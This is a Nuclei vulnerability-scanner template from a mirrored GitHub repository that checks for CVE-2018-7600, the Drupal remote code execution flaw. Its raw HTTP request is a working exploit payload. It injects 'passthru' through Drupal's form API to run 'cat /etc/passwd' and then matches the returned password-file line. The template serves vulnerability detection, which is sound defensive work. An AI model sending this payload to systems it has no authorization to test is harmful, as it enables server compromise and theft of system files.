daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2018/CVE-2018-7600.yaml

77 lines
2.7 KiB
YAML
Raw Blame History

id: CVE-2018-7600
info:
name: Drupal - Remote Code Execution
author: pikpikcu
severity: critical
description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
impact: |
Critical
remediation: |
Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team.
reference:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
- https://www.drupal.org/sa-core-2018-002
- https://groups.drupal.org/security/faq-2018-002
- http://www.securitytracker.com/id/1040598
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7600
cwe-id: CWE-20
epss-score: 0.97568
epss-percentile: 1
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: drupal
product: drupal
shodan-query: http.component:"drupal"
tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive
http:
- raw:
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Referer: {{Hostname}}/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"
matchers-condition: and
matchers:
- type: word
part: header
words:
- application/json
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a0047304502202c09433a57c6712e699f69726c3d55bcae576db5d958bd870a26658faa84eee5022100e52e719b9b5648e1c146e206730d0123767549dfc51d8d2b29b58117fe595a4d:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink